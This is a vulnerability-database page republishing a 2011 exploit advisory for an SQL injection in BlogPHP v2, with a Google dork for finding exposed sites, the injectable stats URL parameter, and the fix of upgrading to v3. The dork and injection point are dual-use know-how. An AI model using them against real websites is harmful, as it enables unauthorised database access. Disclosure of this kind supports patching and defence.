BlogPHP 2 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048845 漏洞类型
发布时间 2011-08-10 更新时间 2011-08-10
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080063
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################################################################################
[+] Title            : BlogPHP v2 SQL Injection
[+] Name             : BlogPHP
[+] Affected Version : v2
[+] Software Link    : http://sourceforge.net/projects/blogphpscript/files/blogphpscript/2.0/BlogPHPv2.zip/download
[+] Tested on        : (L):Vista & Windows Xp and Windows 7
[+] Dork             : Google Dork: "Copyright ©2006 Powered by www.blogphp.net"
[+] Date             : 09/08/2011
#######################################################################################
[+] Author           : Yassin Aboukir
[+] Contact          : 01Xp01@Gmail.com
[+] Site             : http://www.yaboukir.com
#######################################################################################

# Special thanks to Paul Maaouchy for his First found in Members.html. 
  -- See More : http://www.exploit-db.com/exploits/17640/

#######################################################################################
[+] Error :
Operating Systems:

Warning: Division by zero in /home/Username/public_html/index.php on line 520
Unknown (0%)

Browsers:

Warning: Division by zero in /home/Username/public_html/index.php on line 552
Unknown (0%)


[+] How to exploit :

http://localhost/Path/index.php?act=stats&day=09&month=08&year=2011[SQL Me]

[+] Fix : upgrade to last release (v3)